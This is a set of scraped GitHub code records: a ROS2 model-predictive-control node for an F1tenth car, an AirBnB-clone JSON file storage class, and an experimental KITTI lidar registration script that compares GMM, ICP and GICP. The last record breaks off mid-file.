message.color.b=0.0\n message.color.g=0.0\n message.lifetime.nanosec=int(1e8)\n\n\n for i in range(len(self.ox)-1):\n message.color.a=1.0\n\n message.id=i\n message.header.stamp = self.get_clock().now().to_msg()\n\n point1 = Point()\n point1.x = float(self.ox[i])\n point1.y = float(self.oy[i])\n point1.z = 0.0\n message.points.append(point1)\n\n point2 = Point()\n point2.x = float(self.ox[i+1])\n point2.y = float(self.oy[i+1])\n point2.z = 0.0\n message.points.append(point2)\n self.spline_publisher.publish(message)\n return message\n \n def publish_rviz_data(self):\n 
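# re-send the cached waypoint, spline and MPC-path markers each cycle\n        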
self.goal_points_publisher.publish(self.pp_points_data)\n        self.spline_publisher.publish(self.pp_spline_data)\n        self.mpc_path_publisher.publish(self.mpc_spline_data)\n\n    ########################### VISUALIZATION ############################\n    \ndef global_2_local(quaternion, pt_w, T_c_w):\n    # Transform goal point to vehicle frame of reference\n    rot = (R.as_matrix(R.from_quat(quaternion)))\n    pt_c = (np.array(pt_w) - np.array(T_c_w))@rot\n    \"\"\" \n    # Alternate Method \n    H_global2car = np.zeros([4, 4]) #rigid body transformation from the global frame of reference to the car\n    H_global2car[3, 3] = 1\n    current_rotation_matrix = R.from_quat(np.array([current_quat.x,current_quat.y,current_quat.z,current_quat.w])).as_matrix()\n    H_global2car[0:3, 0:3] = np.array(current_rotation_matrix)\n    H_global2car[0:3, 3] = np.array([current_position.x, current_position.y, current_position.z])\n\n    # Calculate point\n    goal_point_global = np.append(pt_w, 1).reshape(4, 1)\n    pt_c = np.linalg.inv(H_global2car) @ goal_point_global\n    \"\"\"\n    return pt_c\n\ndef load_points(file, scaler=10):\n    # Open csv and read the waypoint data\n    with open(file, 'r') as f:\n        lines = (line for line in f if not line.startswith('#'))\n        data = np.loadtxt(lines, delimiter=',', dtype=float)\n    points = data / scaler\n\n    return points\n    \ndef main(args=None):\n    rclpy.init(args=args)\n    print(\"MPC Initialized\")\n    mpc_node = MPC()\n    rclpy.spin(mpc_node)\n\n    mpc_node.destroy_node()\n    rclpy.shutdown()\n\nif __name__ == '__main__':\n    main()\n","repo_name":"architnh/f1tenth_mpc","sub_path":"mpc/mpc/mpc_node.py","file_name":"mpc_node.py","file_ext":"py","file_size_in_byte":28160,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"}
{"seq_id":"37470347790","text":"#!/usr/bin/python3\n'''\n    Define class FileStorage\n'''\nimport json\nimport models\n\n\nclass FileStorage:\n    '''\n        Serializes instances to JSON file and deserializes to JSON file.\n    '''\n    __file_path = \"file.json\"\n    __objects = {}\n\n    def all(self, cls=None):\n        '''\n            Return the dictionary if cls == None, else return a dictionary of\n            all classes of type cls\n        '''\n        objs = {}\n        if cls is None:\n            return self.__objects\n        for key, val in FileStorage.__objects.items():\n            if cls.__name__ == val.__class__.__name__:\n                objs[key] = val\n        return objs\n\n    def new(self, obj):\n        '''\n            Set in __objects the obj with key <obj class name>.id\n            Arguments:\n                obj : An instance object.\n        '''\n        key = str(obj.__class__.__name__) + \".\" + str(obj.id)\n        value_dict = obj\n        FileStorage.__objects[key] = value_dict\n\n    def save(self):\n        '''\n            Serializes __objects attribute to JSON file.\n        '''\n        objects_dict = {}\n        for key, val in FileStorage.__objects.items():\n            objects_dict[key] = val.to_dict()\n\n        with open(FileStorage.__file_path, mode='w', encoding=\"UTF8\") as fd:\n            json.dump(objects_dict, fd)\n\n    def reload(self):\n        '''\n            Deserializes the JSON file to __objects.\n        '''\n        try:\n            with open(FileStorage.__file_path, encoding=\"UTF8\") as fd:\n                objects = json.load(fd)\n            for key, val in objects.items():\n                class_name = val[\"__class__\"]\n                class_name = models.classes[class_name]\n                if \"id\" in val:\n                    obj_id = val[\"id\"]\n                new = class_name(**val)\n                key = str(class_name.__name__) + '.' 
+ str(new.id)\n FileStorage.__objects[key] = new\n except FileNotFoundError:\n pass\n\n def delete(self, obj=None):\n '''\n Deletes obj from __objects if it is there\n '''\n if not obj:\n return\n key = str(obj.__class__.__name__) + \".\" + str(obj.id)\n if key in FileStorage.__objects:\n del FileStorage.__objects[key]\n self.save()\n\n def close(self):\n '''\n Deserializes JSON file to objects\n '''\n self.reload()\n","repo_name":"Kingswaysales/AirBnB_clone_v2","sub_path":"models/engine/file_storage.py","file_name":"file_storage.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8382603069","text":"# -*- coding: utf-8 -*-\r\n\r\nimport pickle as pkl\r\nimport numpy as np\r\nimport numpy.linalg as nplinalg\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.colors import LogNorm\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nfrom sklearn import mixture\r\nfrom sklearn.neighbors import KDTree\r\nfrom uq.gmm import gmmfuncs as uqgmmfnc\r\nfrom utils.plotting import geometryshapes as utpltgmshp\r\nimport time\r\nfrom scipy.optimize import minimize, rosen, rosen_der,least_squares\r\nfrom scipy import interpolate\r\nimport networkx as nx\r\nimport pdb\r\nimport pandas as pd\r\nfrom fastdist import fastdist\r\nimport copy\r\nfrom lidarprocessing import point2Dprocessing as pt2dproc\r\nfrom lidarprocessing import point3Dprocessing as pt3dproc\r\nfrom lidarprocessing import point2Dplotting as pt2dplot\r\nimport lidarprocessing.numba_codes.point2Dprocessing_numba as nbpt2Dproc\r\nfrom sklearn.neighbors import KDTree\r\nimport os\r\nimport pandas as pd\r\ntime_increment = 1.736111516947858e-05\r\nangle_increment = 0.004363323096185923\r\nscan_time = 0.02500000037252903\r\nrange_min, range_max = 0.023000000044703484, 60.0\r\nangle_min,angle_max = -2.3518311977386475,2.3518311977386475\r\nfrom numba import vectorize, float64,guvectorize,int64,double,int32,int64,float32,uintc,boolean\r\nfrom numba import njit, prange,jit\r\nimport scipy.linalg as sclalg\r\nimport scipy.optimize as scopt\r\nfrom pykitticustom import odometry\r\n\r\n# dtype = np.float32\r\nfrom lidarprocessing import icp\r\nimport open3d as o3d\r\n\r\nimport importlib\r\nimport json\r\n\r\nfrom pyslam import slam\r\nimportlib.reload(slam)\r\n#%%\r\n\r\nbasedir ='/media/na0043/misc/DATA/KITTI/odometry/dataset'\r\n# Specify the dataset to load\r\n# sequence = '02'\r\n# sequence = '05'\r\n# sequence = '06'\r\n# sequence = '08'\r\nloop_closed_seq = ['02','05','06','08']\r\nsequence = '05'\r\n\r\ndataset = odometry.odometry(basedir, sequence, frames=None) # frames=range(0, 20, 5)\r\nXtpath=np.zeros((len(dataset),4))\r\nf3 = plt.figure() \r\nax = f3.add_subplot(111)\r\nfor i in range(len(dataset)):\r\n Xtpath[i,:] = dataset.poses[i].dot(np.array([0,0,0,1]))\r\nax.plot(Xtpath[:,0],Xtpath[:,2],'k')\r\nplt.show()\r\n\r\npose = dataset.poses[1]\r\nvelo = dataset.get_velo(2)\r\n\r\n\r\n#%%\r\n\r\nimport faiss\r\nimport numpy as np\r\n\r\n\r\nclass FaissKMeans:\r\n def __init__(self, n_clusters=8, n_init=10, max_iter=300):\r\n self.n_clusters = n_clusters\r\n self.n_init = n_init\r\n self.max_iter = max_iter\r\n self.kmeans = None\r\n self.cluster_centers_ = None\r\n self.inertia_ = None\r\n\r\n def fit(self, X, y):\r\n self.kmeans = faiss.Kmeans(d=X.shape[1],\r\n k=self.n_clusters,\r\n niter=self.max_iter,\r\n nredo=self.n_init)\r\n self.kmeans.train(X.astype(np.float32))\r\n self.cluster_centers_ = self.kmeans.centroids\r\n self.inertia_ = 
self.kmeans.obj[-1]\r\n\r\n def predict(self, X):\r\n return self.kmeans.index.search(X.astype(np.float32), 1)[1]\r\n \r\n#%%\r\nparams={}\r\n\r\nparams['REL_POS_THRESH']=0.5# meters after which a keyframe is made\r\nparams['REL_ANGLE_THRESH']=30*np.pi/180\r\nparams['ERR_THRES']=15\r\nparams['n_components']=200\r\nparams['reg_covar']=0.2\r\n\r\n#%%\r\n\r\ndef WassersteinDist(m1,P1,m2,P2):\r\n s1 = sclalg.sqrtm(P1)\r\n g = np.matmul(np.matmul(s1,P2),s1) \r\n d = np.sqrt( nplinalg.norm(m1-m2)+np.trace( P1+P2-2*sclalg.sqrtm( g ) ) )\r\n \r\n return d\r\n\r\n\r\n@njit(parallel=True)\r\ndef distGmm(MU1,P1,W1,MU2,P2,W2):\r\n n1 = MU1.shape[0]\r\n n2 = MU2.shape[0]\r\n invPP1=np.zeros_like(P1)\r\n for i in range(n1):\r\n invPP1[i] = nplinalg.inv(P1[i])\r\n \r\n invPP2=np.zeros_like(P2)\r\n for i in range(n2):\r\n invPP2[i] = nplinalg.inv(P2[i])\r\n \r\n \r\n D=np.zeros((n1,n2))\r\n for i in prange(n1):\r\n for j in range(n2):\r\n D[i,j] = pt3dproc.BCdist_gassian(MU1[i],P1[i],MU2[j],P2[j])\r\n \r\n f=0\r\n for i in prange(n1): \r\n d=np.sort(D[i])\r\n f+=np.mean(d[d<100]) \r\n # for j in range(n2):\r\n # if D[i,j]>d:\r\n # D[i,j]=0\r\n \r\n # D=0\r\n # for i in prange(n1):\r\n # for j in prange(n2):\r\n # D+= W1[i]*W[j]*(1-BCoeff_gassian(MU1[i],invPP1[i],P1[i],MU2[j],invPP2[j],P2[j]))\r\n # D+= W1[i]*W[j]*(1-BCoeff_gassian(MU1[i],invPP1[i],P1[i],MU2[j],invPP2[j],P2[j]))\r\n \r\n # O=np.ones(n1)\r\n # I=np.identity(n1)\r\n # A=np.zeros((n1+n2,n1*n2))\r\n # for i in range(n2):\r\n # A[i,i*n1:(i*n1+n1)]=O\r\n # A[n2:,i*n1:(i+1)*n1]=I\r\n \r\n # B=np.hstack([W2,W1])\r\n \r\n # res = scopt.linprog(D.reshape(-1), A_ub=None, b_ub=None, A_eq=A, b_eq=B,bounds=(0,1))\r\n \r\n return f\r\n\r\n# @njit([numba.types.Tuple((float32,float32[:]))(float32[:], float32[:,:], float32[:,:], float32[:,:,:],float32[:]),\r\n# numba.types.Tuple((float32,float32[:]))(float64[:], float32[:,:], float32[:,:], float32[:,:,:],float32[:])],\r\n# nopython=True, fastmath=True,nogil=True,parallel=True,cache=False) \r\ndef getcostgradient3Dypr_gmms(x,MU1,P1,W1,MU2,P2,W2):\r\n x=x.astype(dtype)\r\n ncomp=MU1.shape[0]\r\n t=np.zeros(3,dtype=dtype)\r\n t[0]=x[0]\r\n t[1]=x[1]\r\n t[2]=x[2]\r\n phi=x[3]\r\n xi=x[4]\r\n zi=x[5]\r\n\r\n\r\n \r\n Rzphi,dRzdphi=pt3dproc.Rz(phi)\r\n Ryxi,dRydxi=pt3dproc.Ry(xi)\r\n Rxzi,dRxdzi=pt3dproc.Rx(zi)\r\n\r\n R = Rzphi.dot(Ryxi)\r\n R=R.dot(Rxzi)\r\n \r\n \r\n \r\n\r\n G=dRzdphi.dot(Ryxi)\r\n dRdphi=G.dot(Rxzi)\r\n \r\n G=Rzphi.dot(dRydxi)\r\n dRdxi=G.dot(Rxzi)\r\n \r\n G=Rzphi.dot(Ryxi)\r\n dRdzi=G.dot(dRxdzi)\r\n \r\n\r\n MU2trans=R.dot(MU1.T).T+t\r\n\r\n # invPP1=np.zeros_like(P1)\r\n # invPP2=np.zeros_like(P2)\r\n PP2trans=np.zeros_like(P2)\r\n MU2trans=np.zeros_like(MU2)\r\n # denom1 = np.zeros(ncomp,dtype=dtype)\r\n # denom2 = np.zeros(ncomp,dtype=dtype)\r\n for i in range(ncomp):\r\n # invPP1[i] = nplinalg.inv(P1[i])\r\n # denom1[i] = W1[i]*1/np.sqrt(nplinalg.det(2*np.pi*P1[i])) \r\n \r\n # invPP2[i] = nplinalg.inv(P2[i])\r\n # denom2[i] = W2[i]*1/np.sqrt(nplinalg.det(2*np.pi*P2[i])) \r\n PP2trans[i] = np.dot(R.dot(P2[i]),R.T)\r\n\r\n\r\n \r\n return distGmm(MU1,P1,W1,MU2trans,PP2trans,W2)\r\n\r\n#%%\r\nfrom sklearn import mixture\r\nplt.close(\"all\")\r\nfolder='lidarprocessing/'\r\n\r\ni=1\r\nf1=\"%06d.bin\"%i\r\nX1 = np.fromfile(folder+'/'+f1, dtype=np.float32)\r\nX1=X1.reshape((-1, 4))\r\nX1=X1.astype(dtype)\r\n\r\npcd = o3d.geometry.PointCloud()\r\npcd.points = o3d.utility.Vector3dVector(X1[:,:3])\r\nvoxel_down_pcd = 
pcd.voxel_down_sample(voxel_size=0.1)\r\nX11=np.asarray(voxel_down_pcd.points)\r\nX11=np.ascontiguousarray(X11,dtype=dtype)\r\n\r\nX22=X11+1\r\n\r\n\r\nvoxel_down_pcd.estimate_normals(\r\n search_param=o3d.geometry.KDTreeSearchParamHybrid(radius=0.2, max_nn=30))\r\nXn=np.array(voxel_down_pcd.normals)\r\n\r\nX11n=np.hstack([X11,np.array(voxel_down_pcd.normals)])\r\n\r\nX11=X11[:10000,:]\r\nX11n=X11n[:10000,:]\r\nX22=X22[:10000,:]\r\n\r\nNcmp=100\r\n# from scipy.cluster.vq import kmeans2\r\n# centroid, label = kmeans2(X11.T, Ncmp, minit='points')\r\n\r\nfkm=FaissKMeans(n_clusters=Ncmp, n_init=10, max_iter=50)\r\nfkm.fit(np.ascontiguousarray(X11n,dtype=dtype),None)\r\nXkmidx=fkm.predict(X11n)\r\nXkmidx=Xkmidx.reshape(-1)\r\n\r\nMU=np.zeros((Ncmp,3),dtype=dtype)\r\ninvP=np.zeros((Ncmp,3,3),dtype=dtype)\r\nP=np.zeros((Ncmp,3,3),dtype=dtype)\r\nW=np.ones(Ncmp)/Ncmp\r\nfor i in range(Ncmp):\r\n X=X11[Xkmidx==i,:]\r\n MU[i]=np.mean(X,axis=0)\r\n P[i]=np.cov(X.T)\r\n invP[i]=nplinalg.inv(P[i])\r\n\r\nW=W/sum(W)\r\n\r\n# MU,P,W=pt3dproc.gmmEM(X11,MU.copy(),P.copy(),W.copy(),250,0.1)\r\n\r\nfig = plt.figure(\"x-y kmeans\")\r\nax = fig.add_subplot(111)\r\nax.plot(X11[:,0],X11[:,1],'b.')\r\nfor i in range(len(W)):\r\n Xgmm=utpltgmshp.getCovEllipsePoints2D(MU[i,0:2],P[i,0:2,0:2],nsig=1,N=100)\r\n ax.plot(Xgmm[:,0],Xgmm[:,1],'r')\r\n\r\n \r\nclf = mixture.GaussianMixture(n_components=Ncmp,\r\n covariance_type='full',reg_covar=0.1,weights_init=W,means_init=MU,precisions_init=invP,\r\n warm_start=True,max_iter=10)\r\n \r\nclf.fit(X11)\r\n\r\nMU=np.ascontiguousarray(clf.means_,dtype=dtype)\r\nP=np.ascontiguousarray(clf.covariances_,dtype=dtype)\r\nW=np.ascontiguousarray(clf.weights_,dtype=dtype)\r\n\r\nfig = plt.figure(\"x-y after EM\")\r\nax = fig.add_subplot(111)\r\nax.plot(X11[:,0],X11[:,1],'b.')\r\nfor i in range(len(W)):\r\n Xgmm=utpltgmshp.getCovEllipsePoints2D(MU[i,0:2],P[i,0:2,0:2],nsig=1,N=100)\r\n ax.plot(Xgmm[:,0],Xgmm[:,1],'r')\r\n \r\n \r\n\r\nclf = mixture.GaussianMixture(n_components=Ncmp,\r\n covariance_type='full',reg_covar=0.1,\r\n warm_start=False)\r\n \r\nclf.fit(X22)\r\n\r\nMU2=np.ascontiguousarray(clf.means_,dtype=dtype)\r\nP2=np.ascontiguousarray(clf.covariances_,dtype=dtype)\r\nW2=np.ascontiguousarray(clf.weights_,dtype=dtype)\r\n\r\n\r\n\r\n\r\nplotit=False\r\nif plotit:\r\n fig = plt.figure()\r\n ax = fig.add_subplot(111, projection='3d')\r\n ax.plot(X11[:,0],X11[:,1],X11[:,2],'b.')\r\n \r\n fig = plt.figure(\"x-y\")\r\n ax = fig.add_subplot(111)\r\n ax.plot(X11[:,0],X11[:,1],'b.')\r\n for i in range(len(W)):\r\n Xgmm=utpltgmshp.getCovEllipsePoints2D(MU[i,0:2],P[i,0:2,0:2],nsig=1,N=100)\r\n ax.plot(Xgmm[:,0],Xgmm[:,1],'r')\r\n \r\n fig = plt.figure(\"y-z\")\r\n ax = fig.add_subplot(111)\r\n ax.plot(X11[:,1],X11[:,2],'b.')\r\n for i in range(len(W)):\r\n Xgmm=utpltgmshp.getCovEllipsePoints2D(MU[i,1:3],P[i,1:3,1:3],nsig=1,N=100)\r\n ax.plot(Xgmm[:,0],Xgmm[:,1],'r')\r\n \r\n fig = plt.figure(\"x-z\")\r\n ax = fig.add_subplot(111)\r\n ax.plot(X11[:,0],X11[:,2],'b.')\r\n for i in range(len(W)):\r\n Xgmm=utpltgmshp.getCovEllipsePoints2D(MU[i,[0,2]],P[i,0:3:2,0:3:2],nsig=1,N=100)\r\n ax.plot(Xgmm[:,0],Xgmm[:,1],'r')\r\n \r\n\r\nx=np.array([-2,-2,-2,np.pi/8,0,0],dtype=dtype)\r\nst=time.time()\r\nf,g=pt3dproc.getcostgradient3Dypr(x,X22.T,MU,P,W)\r\nprint(\"f=\",f)\r\net=time.time()\r\nprint(\"grad :\",et-st)\r\n\r\n# def gg(x,Xt,MU,P,W):\r\n# x=np.hstack([x,np.zeros(3)])\r\n# x=x.astype(dtype)\r\n# f,g=pt3dproc.getcostgradient3Dypr(x,Xt,MU,P,W)\r\n# return f\r\n\r\n# res = minimize(gg, 
x[0:3],args=(X22,MU,P,W),jac= '3-point',tol=1e-3,method='BFGS',options={'disp':True,'gtol':1e-3}) # 'Nelder-Mead'\r\n# print(res)\r\n# SLSQP\r\nst=time.time()\r\nres1 = minimize(pt3dproc.getcostgradient3Dypr, x,args=(X22.T,MU,P,W),jac= True,tol=1e-3,method='BFGS',options={'disp':True,'maxiter':10}) # 'Nelder-Mead'\r\net=time.time()\r\nprint(\"time :\",et-st)\r\nprint(res1.x) \r\n\r\nst=time.time()\r\nres2 = minimize(pt3dproc.getcostgradient3Dypr_v2, x,args=(X22,MU,P,W),jac= True,tol=1e-1,method='BFGS',options={'disp':True,'maxiter':15}) # 'Nelder-Mead'\r\net=time.time()\r\nprint(\"time :\",et-st) \r\nprint(res2.x) \r\n\r\nst=time.time()\r\nres3 = minimize(getcostgradient3Dypr_gmms, x,args=(MU,P,W,MU2,P2,W2),jac= None,tol=1e-3,method='Nelder-Mead',options={'disp':True}) # 'Nelder-Mead'\r\net=time.time()\r\nprint(\"time :\",et-st) \r\n\r\n\r\n\r\n#%%\r\nplt.close(\"all\")\r\nD={\"icp\":{},\r\n \"gicp\":{},\r\n \"gicp_cost\":{},\r\n \"ndt\":{}}\r\n\r\nD[\"icp\"][\"enable\"]=1\r\nD[\"icp\"][\"setMaximumIterations\"]=500\r\nD[\"icp\"][\"setMaxCorrespondenceDistance\"]=10\r\nD[\"icp\"][\"setRANSACIterations\"]=0.0\r\nD[\"icp\"][\"setRANSACOutlierRejectionThreshold\"]=1.5\r\nD[\"icp\"][\"setTransformationEpsilon\"]=1e-9\r\nD[\"icp\"][\"setEuclideanFitnessEpsilon\"]=0.01\r\n\r\n\r\nD[\"gicp_cost\"][\"enable\"]=0\r\n\r\n\r\nD[\"gicp\"][\"enable\"]=1\r\nD[\"gicp\"][\"setMaxCorrespondenceDistance\"]=10\r\nD[\"gicp\"][\"setMaximumIterations\"]=30.0\r\nD[\"gicp\"][\"setMaximumOptimizerIterations\"]=30.0\r\nD[\"gicp\"][\"setRANSACIterations\"]=0.0\r\nD[\"gicp\"][\"setRANSACOutlierRejectionThreshold\"]=1.5\r\nD[\"gicp\"][\"setTransformationEpsilon\"]=1e-9\r\nD[\"gicp\"][\"setUseReciprocalCorrespondences\"]=1\r\n\r\nD[\"ndt\"][\"enable\"]=0\r\nD[\"ndt\"][\"setTransformationEpsilon\"]=1e-9\r\nD[\"ndt\"][\"setStepSize\"]=2.0\r\nD[\"ndt\"][\"setResolution\"]=1.0\r\nD[\"ndt\"][\"setMaximumIterations\"]=25.0\r\nD[\"ndt\"][\"initialguess_axisangleA\"]=0.0\r\nD[\"ndt\"][\"initialguess_axisangleX\"]=0.0\r\nD[\"ndt\"][\"initialguess_axisangleY\"]=0.0\r\nD[\"ndt\"][\"initialguess_axisangleZ\"]=1.0\r\nD[\"ndt\"][\"initialguess_transX\"]=0.5\r\nD[\"ndt\"][\"initialguess_transY\"]=0.01\r\nD[\"ndt\"][\"initialguess_transZ\"]=0.01\r\n\r\n\r\n# res2 = minimize(pt3dproc.getcostgradient3Dypr_v2, x,args=(X22,MU,P,W),jac= True,tol=1e-1,method='BFGS',options={'disp':True,'maxiter':15}) # 'Nelder-Mead'\r\n# t=res2.x[:3]\r\n# phi=res2.x[3]\r\n# xi=res2.x[4]\r\n# zi=res2.x[5]\r\n# Rzphi,dRzdphi=pt3dproc.Rz(phi)\r\n# Ryxi,dRydxi=pt3dproc.Ry(xi)\r\n# Rxzi,dRxdzi=pt3dproc.Rx(zi)\r\n\r\n# R = Rzphi.dot(Ryxi)\r\n# R=R.dot(Rxzi)\r\n# H=np.hstack([R,t.reshape(-1,1)])\r\n# H=np.vstack([H,[0,0,0,1]])\r\n# H=H.astype(np.float32)\r\n\r\nXlims=[-50,50]\r\nYlims=[-50,50]\r\nZlims=[-3,3]\r\ndef limitpcd(X):\r\n X=X[(X[:,0]>=Xlims[0]) & (X[:,0]<=Xlims[1])]\r\n X=X[(X[:,1]>=Ylims[0]) & (X[:,1]<=Ylims[1])]\r\n X=X[(X[:,2]>=Zlims[0]) & (X[:,2]<=Zlims[1])]\r\n return X\r\n\r\n# fig = plt.figure()\r\n# ax = fig.add_subplot(111, projection='3d')\r\n# ax.plot(X11[:,0],X11[:,1],X11[:,2],'b.')\r\n\r\n# X11=limitpcd(X11) \r\n# fig = plt.figure()\r\n# ax = fig.add_subplot(111, projection='3d')\r\n# ax.plot(X11[:,0],X11[:,1],X11[:,2],'b.')\r\n\r\n\r\nHicp=[np.identity(4)]\r\nHgicp=[np.identity(4)]\r\nHndt=[np.identity(4)]\r\n\r\nXicp=np.zeros((len(dataset),3))\r\nXgicp=np.zeros((len(dataset),3))\r\nXndt=np.zeros((len(dataset),3))\r\n\r\nHgmmtrans=[np.identity(4)]\r\n\r\nfig = plt.figure(\"gg-plot\")\r\nax = fig.add_subplot(111,projection='3d')\r\n\r\nfor 
pp in range(1,len(dataset)):\r\n print(pp)\r\n X1 = dataset.get_velo(pp-1)\r\n X2 = dataset.get_velo(pp)\r\n \r\n X1=X1[:,:3]\r\n X2=X2[:,:3]\r\n # phi=np.pi/8*np.random.randn()\r\n # xi=np.pi/8*np.random.randn()\r\n # zi=np.pi/8*np.random.randn()\r\n # Rzphi,dRzdphi=pt3dproc.Rz(phi)\r\n # Ryxi,dRydxi=pt3dproc.Ry(xi)\r\n # Rxzi,dRxdzi=pt3dproc.Rx(zi)\r\n\r\n # R = Rzphi.dot(Ryxi)\r\n # R=R.dot(Rxzi)\r\n # X2=X2+2*np.random.randn(X2.shape[0],X2.shape[1])\r\n\r\n pcd1 = o3d.geometry.PointCloud()\r\n pcd1.points = o3d.utility.Vector3dVector(X1)\r\n voxel_down_pcd1 = pcd1.voxel_down_sample(voxel_size=0.1)\r\n \r\n X11=np.asarray(voxel_down_pcd1.points)\r\n # X11=np.ascontiguousarray(X11,dtype=dtype)\r\n \r\n pcd2 = o3d.geometry.PointCloud()\r\n pcd2.points = o3d.utility.Vector3dVector(X2)\r\n voxel_down_pcd2 = pcd2.voxel_down_sample(voxel_size=0.1)\r\n \r\n X22=np.asarray(voxel_down_pcd2.points)\r\n # X22=np.ascontiguousarray(X22,dtype=dtype)\r\n \r\n \r\n \r\n\r\n \r\n \r\n ##\r\n voxel_down_pcd1.estimate_normals(\r\n search_param=o3d.geometry.KDTreeSearchParamHybrid(radius=0.5, max_nn=30))\r\n Xn=np.array(voxel_down_pcd1.normals)\r\n Xnormals = np.array(voxel_down_pcd1.normals)\r\n X11n=np.hstack([X11,Xnormals])\r\n\r\n X11=limitpcd(X11) \r\n X22=limitpcd(X22) \r\n X11n=limitpcd(X11n) \r\n \r\n Ncmp=100\r\n # st=time.time()\r\n # fkm=FaissKMeans(n_clusters=Ncmp, n_init=5, max_iter=50)\r\n # fkm.fit(np.ascontiguousarray(X11n,dtype=dtype),None)\r\n # Xkmidx=fkm.predict(X11n)\r\n # Xkmidx=Xkmidx.reshape(-1)\r\n\r\n # MU=np.zeros((Ncmp,3),dtype=dtype)\r\n # invP=np.zeros((Ncmp,3,3),dtype=dtype)\r\n # P=np.zeros((Ncmp,3,3),dtype=dtype)\r\n # W=np.ones(Ncmp)/Ncmp\r\n # for i in range(Ncmp):\r\n # X=X11[Xkmidx==i,:]\r\n # MU[i]=np.mean(X,axis=0)\r\n # P[i]=np.cov(X.T)\r\n # invP[i]=nplinalg.inv(P[i])\r\n\r\n # W=W/sum(W)\r\n \r\n # clf = mixture.GaussianMixture(n_components=Ncmp,\r\n # covariance_type='full',reg_covar=0.01,weights_init=W,means_init=MU,precisions_init=invP,\r\n # warm_start=True)\r\n # clf = mixture.GaussianMixture(n_components=Ncmp,\r\n # covariance_type='full',reg_covar=0.01, warm_start=True)\r\n \r\n # clf.fit(X11)\r\n\r\n # MU=np.ascontiguousarray(clf.means_,dtype=dtype)\r\n # P=np.ascontiguousarray(clf.covariances_,dtype=dtype)\r\n # W=np.ascontiguousarray(clf.weights_,dtype=dtype)\r\n # et=time.time()\r\n # print(\"time taken by EM = \", et-st)\r\n # st=time.time()\r\n \r\n # x=np.array([0.6,0.05,0.01,np.pi/16,0,0],dtype=dtype)\r\n # res2 = minimize(pt3dproc.getcostgradient3Dypr_v2, x,args=(X22,MU,P,W),jac= True,tol=1e-2,method='BFGS',options={'disp':False,'maxiter':100}) # 'Nelder-Mead'\r\n # t=res2.x[:3]\r\n # phi=res2.x[3]\r\n # xi=res2.x[4]\r\n # zi=res2.x[5]\r\n # Rzphi,dRzdphi=pt3dproc.Rz(phi)\r\n # Ryxi,dRydxi=pt3dproc.Ry(xi)\r\n # Rxzi,dRxdzi=pt3dproc.Rx(zi)\r\n\r\n # R = Rzphi.dot(Ryxi)\r\n # R=R.dot(Rxzi)\r\n # H=np.hstack([R,t.reshape(-1,1)])\r\n # H=np.vstack([H,[0,0,0,1]])\r\n # H=H.astype(np.float32)\r\n # Hgmmtrans.append(H)\r\n # et=time.time()\r\n # print(\"time taken by BFGS = \", et-st)\r\n \r\n # X11=limitpcd(X11) \r\n # X22=limitpcd(X22) \r\n \r\n Hpcl=slam.registrations(X22,X11,json.dumps(D))\r\n Hpcl=dict(Hpcl)\r\n # HH=icp.icp(X22, X11, init_pose=None, max_iterations=100, tolerance=0.001)\r\n # Hpcl[0]=nplinalg.inv(Hpcl[0])\r\n # HtransPCL.append(Hpcl)\r\n \r\n # ICP path\r\n\r\n\r\n Xicp=np.zeros((len(dataset),3))\r\n Xgicp=np.zeros((len(dataset),3))\r\n Xndt=np.zeros((len(dataset),3))\r\n\r\n \r\n H=Hpcl[\"H_icp\"]\r\n Hicp.append(Hicp[-1].dot(H))\r\n 
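# accumulate the GICP relative transform into its own absolute pose chain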
\r\n H=Hpcl[\"H_gicp\"]\r\n Hgicp.append(Hgicp[-1].dot(H))\r\n \r\n # H=Hpcl[\"H_ndt\"]\r\n # Hndt.append(Hndt[-1].dot(H))\r\n \r\n # H=Hgmmtrans[i]\r\n # Hgmm=Hgmm.dot(H)\r\n \r\n Xicp[pp]=Hicp[-1][0:3,3]\r\n Xgicp[pp]=Hgicp[-1][0:3,3]\r\n # Xndt[pp]=Hndt[-1][0:3,3]\r\n # Xgmm[i]=Hgmm[0:3,3]\r\n \r\n n=len(Hicp) \r\n \r\n ax.cla()\r\n \r\n \r\n # ax.plot(Xtpath[:n,2],-Xtpath[:n,0],'k',label='True')\r\n ax.plot(Xgicp[:n,0],Xgicp[:n,1],Xgicp[:n,2],'r',label='gicp')\r\n # ax.plot(Xndt[:n,0],Xndt[:n,1],Xndt[:n,2],'b',label='ndt')\r\n ax.plot(Xicp[:n,0],Xicp[:n,1],Xicp[:n,2],'g',label='icp')\r\n # ax.plot(Xgmm[:n,0],Xgmm[:n,1],'b',label='gmm')\r\n ax.legend()\r\n ax.set_title(\"main-all\")\r\n plt.pause(0.1)\r\n plt.show()\r\n \r\n if pp>150:\r\n break\r\n \r\n \r\n\r\nn=len(Hicp)\r\n\r\n\r\nplt.close(\"all\") \r\nfig = plt.figure()\r\nax = fig.add_subplot(111)\r\nax.plot(Xtpath[:n,2],-Xtpath[:n,0],'k',label='True')\r\nax.set_title(\"true\")\r\n\r\nfig = plt.figure()\r\nax = fig.add_subplot(111)\r\nax.plot(Xtpath[:n,2],-Xtpath[:n,0],'k',label='True')\r\nax.plot(Xicp[:n,0],Xicp[:n,1],'r',label='icp')\r\nax.legend()\r\nax.set_title(\"icp\")\r\n\r\n\r\nfig = plt.figure()\r\nax = fig.add_subplot(111)\r\nax.plot(Xtpath[:n,2],-Xtpath[:n,0],'k',label='True')\r\nax.plot(Xgicp[:n,0],Xgicp[:n,1],'b',label='gicp')\r\nax.legend()\r\nax.set_title(\"gicp\")\r\n\r\n\r\n\r\n# fig = plt.figure()\r\n# ax = fig.add_subplot(111)\r\n# ax.plot(Xtpath[:n,2],-Xtpath[:n,0],'k',label='True')\r\n# ax.plot(Xndt[:n,0],Xndt[:n,1],'g',label='ndt')\r\n# ax.legend()\r\n# ax.set_title(\"ndt\")\r\n\r\n# fig = plt.figure()\r\n# ax = fig.add_subplot(111)\r\n# ax.plot(Xtpath[:n,2],-Xtpath[:n,0],'k',label='True')\r\n# ax.plot(Xgmm[:n,0],Xgmm[:n,1],'b',label='gmm')\r\n# ax.legend()\r\n# ax.set_title(\"gmm\")\r\n\r\nfig = plt.figure()\r\nax = 